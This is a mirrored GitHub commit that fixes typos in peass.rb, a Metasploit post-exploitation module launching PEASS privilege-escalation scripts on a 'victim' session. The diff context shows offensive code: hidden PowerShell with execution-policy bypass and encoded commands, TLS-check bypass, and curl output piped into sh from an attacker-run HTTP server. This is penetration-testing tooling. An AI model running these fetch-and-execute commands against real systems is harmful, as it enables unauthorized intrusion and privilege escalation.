1
mirror of https://github.com/carlospolop/PEASS-ng synced 2024-11-24 01:26:22 +01:00

Update peass.rb

Fix typos, grammar and misspelled words.
This commit is contained in:
galoget 2023-07-25 12:33:15 -05:00 committed by GitHub
parent 41e2367be6
commit 6525727ca9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -18,7 +18,7 @@ class MetasploitModule < Msf::Post
'Name' => 'Multi PEASS launcher',
'Description' => %q{
This module will launch the indicated PEASS (Privilege Escalation Awesome Script Suite) script to enumerate the system.
You need to indicate the URL or local path to LinPEAS if you are in some Unix or to WinPEAS if you are in Windows.
You need to indicate the URL or local path to LinPEAS if you are on any Unix-based system or to WinPEAS if you are on Windows.
By default this script will upload the PEASS script to the host (encrypted and/or encoded) and will load, deobfuscate, and execute it.
You can configure this module to download the encrypted/encoded PEASS script from this metasploit instance via HTTP instead of uploading it.
},
@ -56,14 +56,14 @@ class MetasploitModule < Msf::Post
# Load PEASS script in memory
peass_script = load_peass()
print_good("PEASS script successfully retreived.")
print_good("PEASS script successfully retrieved.")
# Obfuscate loaded PEASS script
if datastore["PASSWORD"].length > 1
# If no Windows, check if openssl exists
if !session.platform.include?("win")
openssl_path = cmd_exec("command -v openssl")
raise 'openssl not found in victim, unset the password of the module!' unless openssl_path.include?("openssl")
raise 'openssl not found on victim, unset the password of the module!' unless openssl_path.include?("openssl")
end
# Get encrypted PEASS script in B64
@ -97,7 +97,7 @@ class MetasploitModule < Msf::Post
# If no Windows, check if base64 exists
if !session.platform.include?("win")
base64_path = cmd_exec("command -v base64")
raise 'base64 not found in victim, set a 32B length password!' unless base64_path.include?("base64")
raise 'base64 not found on victim, set a 32B length password!' unless base64_path.include?("base64")
end
# Encode PEASS script
@ -146,7 +146,7 @@ class MetasploitModule < Msf::Post
last_cmd = " ; rm #{temp_path}"
end
# Instead of writting the file to disk, download it from HTTP
# Instead of writing the file to disk, download it from HTTP
else
last_cmd = ""
# Start HTTP server
@ -159,13 +159,13 @@ class MetasploitModule < Msf::Post
url_download_peass = http_protocol + http_ip + http_port + http_path
print_good("Listening in #{url_download_peass}")
# Configure the download of the scrip in Windows
# Configure the download of the script in Windows
if session.platform.include?("win")
cmd = "$ProgressPreference = 'SilentlyContinue';"
cmd += get_bypass_tls_cert()
cmd += "$#{ps_var1} = Invoke-WebRequest \"#{url_download_peass}\" -UseBasicParsing | Select-Object -ExpandProperty Content;"
# Configure the download of the scrip in unix
# Configure the download of the script in Unix
else
cmd = "curl -k -s \"#{url_download_peass}\""
curl_path = cmd_exec("command -v curl")
@ -193,7 +193,7 @@ class MetasploitModule < Msf::Post
tmpout << cmd_exec("powershell.exe", args="-ep bypass -WindowStyle hidden -nop -enc #{cmd_utf16le_b64}", time_out=datastore["TIMEOUT"].to_i)
# If unix, then, suppose linpeas was loaded
# If Unix, then, suppose linpeas was loaded
else
cmd += "| #{decode_linpeass_cmd}"
cmd += "| sh -s -- #{datastore['PARAMETERS']}"
@ -259,7 +259,7 @@ class MetasploitModule < Msf::Post
end
def aes_enc_peass(peass_script)
# Encrypt the PEASS script with aes
# Encrypt the PEASS script with AES (CBC Mode)
key = datastore["PASSWORD"]
iv = OpenSSL::Cipher::Cipher.new('aes-256-cbc').random_iv